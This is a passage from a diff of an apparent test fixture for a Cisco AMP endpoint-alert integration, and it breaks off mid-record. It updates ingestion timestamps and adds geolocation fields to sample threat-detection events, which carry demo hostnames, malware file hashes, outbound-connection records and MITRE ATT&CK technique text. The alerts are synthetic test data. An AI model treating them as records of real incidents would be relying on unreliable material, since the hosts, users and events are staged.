has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "code": "1107296344", "kind": "alert" @@ -191,7 +191,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898030200Z", + "ingested": "2021-12-14T14:40:37.784979482Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519054", "kind": "alert", @@ -294,7 +294,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898033800Z", + "ingested": "2021-12-14T14:40:37.784980235Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519054", "kind": "alert", @@ -382,7 +382,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898041500Z", + "ingested": "2021-12-14T14:40:37.784980844Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", @@ -439,6 +439,18 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.12" }, @@ -480,7 +492,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898046Z", + "ingested": "2021-12-14T14:40:37.784981393Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", @@ -535,6 +547,18 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.12" }, @@ -576,7 +600,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898051200Z", + "ingested": "2021-12-14T14:40:37.784981923Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", @@ -631,6 +655,18 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.12" }, @@ -672,7 +708,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898057100Z", + "ingested": "2021-12-14T14:40:37.784982422Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", @@ -727,6 +763,18 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.12" }, @@ -768,7 +816,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898062900Z", + "ingested": "2021-12-14T14:40:37.784983043Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", @@ -823,6 +871,18 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.12" }, @@ -864,7 +924,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898068800Z", + "ingested": "2021-12-14T14:40:37.784983546Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", @@ -919,6 +979,18 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.12" }, @@ -960,7 +1032,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898074700Z", + "ingested": "2021-12-14T14:40:37.784984362Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", @@ -1039,7 +1111,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898080600Z", + "ingested": "2021-12-14T14:40:37.784984903Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "code": "1107296274", "kind": "alert", @@ -1135,7 +1207,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898086900Z", + "ingested": "2021-12-14T14:40:37.784985672Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat 